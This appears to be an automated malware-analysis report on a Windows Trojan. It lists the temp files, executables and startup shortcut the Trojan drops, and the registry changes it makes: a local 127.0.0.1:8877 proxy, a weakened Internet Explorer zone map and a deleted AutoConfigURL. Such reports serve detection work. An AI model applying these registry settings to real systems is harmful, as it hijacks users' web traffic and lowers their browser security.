%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns56.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns75.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns87.tmp (0 bytes)
C:\a\vchk.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns64.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns99.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns72.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns57.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns76.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns51.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns94.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns92.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns61.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns48.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns59.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns78.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns53.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns93.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns83.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns74.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns54.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns50.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns63.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns79.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns73.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns89.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns90.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns95.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns67.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns96.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns60.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns58.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns68.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns98.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns52.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns69.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns49.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns55.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns66.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns65.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns70.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns85.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns91.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns88.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns71.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns43.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3B.tmp (0 bytes)
The process internetport3.exe:360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\desktop.ini (67 bytes)
C:\a\loogg2.txt (240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\desktop.ini (67 bytes)
C:\a\logff.txt (718 bytes)
The process DYK287G2Jhwy64P0Ln0s.exe:1012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\ckkkp[1].htm (324 bytes)
C:\a\1logff.txt (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aDYK287G2Jhwy64P0Ln0s.html (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\inetc.dll (20 bytes)
C:\a\1loogg2.txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DYK287G2Jhwy64P0Ln0s.html (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\ns27.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\ckkk[1].htm (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\localhost[1].htm (716 bytes)
C:\a\vv11111.txt (22835 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\aDYK287G2Jhwy64P0Ln0s.html (0 bytes)
C:\a\ProcessList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\DYK287G2Jhwy64P0Ln0s.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\ns27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html (0 bytes)
C:\a\vv11111.txt (0 bytes)
The process %original file name%.exe:1756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a\FiddlerCore.dll (9485 bytes)
C:\a\zuur.txt (2 bytes)
C:\a\internetport3.exe (10 bytes)
C:\a\wcheckf.exe (397 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\System.dll (11 bytes)
C:\a\zhho.txt (3 bytes)
C:\a\zvchk.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\uniqueDYK287G2Jhwy64P0Ln0s[1].htm (10 bytes)
%Program Files%\FastInternet\app.exe (1078 bytes)
C:\a\29935426.bat (287 bytes)
C:\a\winonit.exe (435 bytes)
C:\a\DYK287G2Jhwy64P0Ln0s.exe (3808 bytes)
C:\a\ayyyyy.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\AccessControl.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\inetc.dll (20 bytes)
C:\a\ukey.ini (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\bdcount[1].htm (8 bytes)
C:\a\zvv.txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\DYK287G2Jhwy64P0Ln0s[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\UAC.dll (13 bytes)
C:\a\ver.ini (8 bytes)
C:\a\getcap.exe (10027 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\pwgen.dll (17 bytes)
C:\a\uniqueDYK287G2Jhwy64P0Ln0s.ini (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\cki[1].htm (11 bytes)
%System%\63839615.bat (19 bytes)
C:\a\install.txt (1 bytes)
%Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
C:\a\wincheckfe.exe (778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp (4 bytes)
C:\a\lOD0hGDlkq.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\SimpleFC.dll (5289 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\pwgen.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\SimpleFC.dll (0 bytes)
Registry activity
The process winonit.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 8D 5D E1 37 C1 36 55 E7 82 31 EC 60 50 5D AD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"-loopback>
The Trojan modifies the IE security-zone map so that all network (UNC) paths are placed in the Local Intranet zone, which carries weaker defaults than the Internet zone (for example automatic logon with the current Windows credentials):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
It also places all sites that bypass the proxy server in the Local Intranet zone:
"ProxyBypass" = "1"
and all local sites not listed in any other zone in the Local Intranet zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process getcap.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 AD A8 23 DC 66 62 C4 37 71 C6 6A 38 98 24 0B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process WMIC.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D A5 EA 88 81 6C 58 DD B8 35 05 49 37 C5 C2 46"
The process wincheckfe.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD D9 CB 7A EA 62 17 E3 D3 1C D4 6B F9 6C A5 77"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process wcheckf.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 C5 1C 10 E0 0C B7 64 12 3A 69 55 38 29 94 B0"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
